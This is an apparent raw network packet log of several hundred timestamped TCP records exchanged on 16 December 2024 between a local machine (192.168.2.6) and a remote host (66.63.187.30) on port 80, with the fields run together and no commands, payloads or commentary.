                                                                                                  Dec 16, 2024 17:04:59.321388006 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.321443081 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.322866917 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.322921991 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.323004961 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.323117018 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.324996948 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.325006008 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.325047016 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.325072050 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.326347113 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.326396942 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.326411009 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.326745033 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.327851057 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.327893972 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.327931881 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.327981949 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.329534054 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.329585075 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.329647064 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.329763889 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.331132889 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.331204891 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.331289053 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.331603050 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.332787037 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.332833052 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.332945108 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.332990885 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.334598064 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.334728003 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.334772110 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.334772110 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.336427927 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.336484909 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.336553097 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.336668968 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.337907076 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.337959051 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.338058949 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.338217020 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.339834929 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.339883089 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.339910984 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.340095997 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.341398954 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.341500998 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.341557980 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.342794895 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.342865944 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.342876911 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.343013048 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.344387054 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.344438076 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.344470978 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.344749928 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.346029043 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.346163988 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.346210003 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.347726107 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.347785950 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.347804070 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.347856045 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.349586964 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.349644899 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.349713087 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.349798918 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.350975990 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.351074934 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.351130009 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.351294994 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.352672100 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.352773905 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.352777958 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.353852987 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.354571104 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.354726076 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.354753971 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.354923010 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.356228113 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.356317043 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.356343985 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.357073069 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.357836008 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.357947111 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.357961893 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.358001947 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.359538078 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.359864950 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.360249996 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.360372066 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.361238003 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.361457109 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.361485958 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.361562014 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.362874985 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.362951040 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.362993002 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.363115072 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.364348888 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.364478111 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.364497900 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.365021944 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.366107941 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.366174936 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.366285086 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.367549896 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.367743015 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.367815971 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.367976904 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.369185925 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.369324923 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.369402885 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.369577885 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.370826960 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.370970964 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.370987892 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.371021032 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.479429007 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.479512930 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.479530096 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.479634047 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.480387926 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.480470896 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.480556011 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.480818033 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.482498884 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.482615948 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.482739925 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.484133005 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.484174013 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.484246969 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.484297991 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.484436035 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.485451937 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.485563993 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.485682011 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.485682011 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.486967087 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.487087011 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.487106085 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.487555027 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.488040924 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.488172054 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.488208055 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.488338947 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.489212036 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.489290953 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.489305019 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.489650011 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.490530968 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.490636110 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.490660906 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.490775108 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.491755009 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.491847992 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.491878033 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.492089987 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.493045092 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.493165016 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.493187904 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.493431091 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.494517088 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.494657040 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.494715929 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.494828939 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.495517969 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.495661020 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.495728970 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.495831013 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.496808052 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.496948957 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.496954918 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.497137070 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.497878075 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.497987032 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.498007059 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.498225927 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.499011993 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.499102116 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.499150991 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.499305964 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.500297070 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.500349045 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.500370979 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.500422955 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.501264095 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.501362085 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.501398087 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.501465082 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.502331018 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.502414942 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.502435923 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.502607107 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.503438950 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.503509998 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.503611088 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.503626108 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.504486084 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.504578114 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.504600048 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.504689932 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.505764961 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.505846024 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.505985022 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.505985022 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.507014990 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.507174969 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.507194042 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.507344007 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.508595943 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.508661985 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.508717060 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.509406090 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.510034084 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.510202885 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.510217905 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.510263920 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.511359930 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.511425972 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.511434078 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.511528015 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.512568951 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.512681007 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.512721062 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.513802052 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.513904095 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.513905048 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.514218092 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.515090942 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.515178919 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.515202045 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.516247034 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.516344070 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.516407967 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.516467094 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.517395020 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.517570019 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.517590046 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.517780066 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.518532038 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.518608093 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.518629074 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.519016027 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.519728899 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.519881010 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.519906998 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.521002054 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.521105051 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.521300077 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.521450996 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.522387981 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.522479057 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.522568941 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.522614956 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.523643017 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.523806095 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.523845911 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.523989916 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.524835110 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.524928093 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.524965048 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.525254011 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.526479959 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.526602983 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.526681900 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.526783943 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.527790070 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.527909040 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.527932882 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.528841972 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.528868914 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.528985023 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.529066086 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.529066086 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.530292034 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.530615091 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.530621052 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.530673981 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.531773090 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.531939030 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.532068968 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.532171965 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.532804012 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.532869101 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.532902002 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.533032894 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.533942938 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.534092903 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.534116030 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.534250975 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.534977913 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.535033941 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.535079956 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.535190105 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.536281109 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.536367893 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.536461115 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.536622047 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.537518978 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.537669897 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.537797928 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.537884951 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.538773060 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.538913012 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.538918972 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.539294004 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.540172100 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.540276051 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.540283918 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.540473938 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.541351080 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.541448116 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.541464090 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.541559935 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.542911053 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.543014050 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.543034077 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.543245077 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.543971062 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.544086933 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.544110060 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.544600964 CET4980880192.168.2.666.63.187.30
                                                                                                  Dec 16, 2024 17:04:59.545171976 CET804980866.63.187.30192.168.2.6
                                                                                                  Dec 16, 2024 17:04:59.545300961 CET804980866.63.187.30192.168.2.6
